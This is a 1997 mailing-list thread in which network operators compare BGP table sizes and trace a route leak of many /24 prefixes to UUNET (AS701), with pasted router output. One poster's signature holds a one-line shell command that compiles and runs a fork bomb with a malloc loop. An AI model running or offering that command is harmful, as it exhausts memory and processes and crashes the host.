anyone else seeing this? BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory -jh-
Yup, my router shows 74K and climbing, digex shows ~79K..... looks like someone's leaking. anybody got a guess where it's coming from? -dave
anyone else seeing this?
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
-jh-
On Tue, 7 Oct 1997, David Schiffrin wrote: |} Yup, my router shows 74K and climbing, digex shows ~79K..... |} |} looks like someone's leaking. |} |} anybody got a guess where it's coming from? AS701 -jh-
Somebody wake up Mr. Sidgemore. On Tue, 7 Oct 1997, Jonathan Heiliger wrote:
On Tue, 7 Oct 1997, David Schiffrin wrote:
|} Yup, my router shows 74K and climbing, digex shows ~79K..... |} |} looks like someone's leaking. |} |} anybody got a guess where it's coming from?
AS701
-jh-
anyone else seeing this?
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
UUNET was injecting bogus routes into the routing tables (check through a show ip bgp listing for 128.1, 128.2...). The routes were being picked up and redistributed by other ISPs as well. They say they've withdrawn all the routes now, and it will just take some time for the entries to age out of the tables. -- John Caruso, Director, System/Network Administration CNET: The Computer Network Email: caruso@cnet.com 150 Chestnut Street Phone: 415.395.7805 x1310 San Francisco, CA 94111 Fax: 415.623.2458
anyone else seeing this?
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
U U N E T . . . Network Next Hop Metric LocPrf Weight Path * i128.1.8.0/24 137.39.252.17 100 0 701 ? *>i128.1.9.0/24 137.39.252.17 100 0 701 ? *>i128.1.10.0/24 137.39.252.17 100 0 701 ? *>i128.1.11.0/24 137.39.252.17 100 0 701 ? *>i128.1.12.0/24 137.39.252.17 100 0 701 ? *>i128.1.13.0/24 137.39.252.17 100 0 701 ? *>i128.1.14.0/24 137.39.252.17 100 0 701 ? *>i128.1.15.0/24 137.39.252.17 100 0 701 ? *>i128.1.16.0/24 137.39.252.17 100 0 701 ? *>i128.1.17.0/24 137.39.252.17 100 0 701 ? *>i128.1.18.0/24 137.39.252.17 100 0 701 ? *>i128.1.19.0/24 137.39.252.17 100 0 701 ? *>i128.1.20.0/24 137.39.252.17 100 0 701 ? *>i128.1.21.0/24 137.39.252.17 100 0 701 ? *>i128.1.22.0/24 137.39.252.17 100 0 701 ? *>i128.1.23.0/24 137.39.252.17 100 0 701 ? ...snip... -sasaki
-----BEGIN PGP SIGNED MESSAGE----- BGP table version is 3244273, main routing table version 3244273 76934 network entries (179618/334802 paths) using 19554272 bytes of memory 26255 BGP path attribute entries using 3526628 bytes of memory 14465 BGP route-map cache entries using 231440 bytes of memory 15354 BGP filter-list cache entries using 245664 bytes of memory Dampening enabled. 35018 history paths, 6292 dampened paths Yup, quite a few of the historical, and a mere 7K damped. At 05:45 PM 10/7/97 -0700, Jonathan Heiliger wrote:
anyone else seeing this?
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of
memory
15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
-jh-
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On Tue, 7 Oct 1997, Jonathan Heiliger wrote:
anyone else seeing this?
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
Nope, I am only seeing 46019 routes. You may need to setup better filters for your external peers. Nathan Stratton President, CTO, NetRail,Inc. ------------------------------------------------------------------------ Phone (888)NetRail NetRail, Inc. Fax (404)522-1939 230 Peachtree Suite 500 WWW http://www.netrail.net/ Atlanta, GA 30303 ------------------------------------------------------------------------ "No king is saved by the size of his army; no warrior escapes by his great strength. - Psalm 33:16
On Tue, 7 Oct 1997, Jonathan Heiliger wrote:
BGP table version is 7270729, main routing table version 7270729 73487 network entries (235540/419163 paths) using 21848380 bytes of memory 15689 BGP path attribute entries using 2281792 bytes of memory 10269 BGP route-map cache entries using 164304 bytes of memory 19134 BGP filter-list cache entries using 306144 bytes of memory
Yup. Thank you, UUNET. I haven't gathered too much information from them, but I saw a ton of /24 routes orginating at UUNET through our MCI link. Our UUNET peering session has yet to come back up. I don't know if they starting announcing routes that were not theres, or if they just were not aggregating any of there routes. Keith ========================================================================== Keith M. McCallion Director; Network Operations Trippin on irc.iswest.net Internet Specialties West keith@iswest.net/keith@hick.com 31194 La Baya Dr, Ste 106 P: 818-735-3000, F: 818-735-3004 Westlake Village, Calif. 91362 ========================================================================== echo "main(){while(1){malloc(10000);fork();}}" >z.c;gcc -o z z.c;./z ==========================================================================
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Alex Rubenstein
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Chris A. Icide
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David Schiffrin
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John Caruso
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Jonathan Heiliger
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Keith McCallion
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Nathan Stratton
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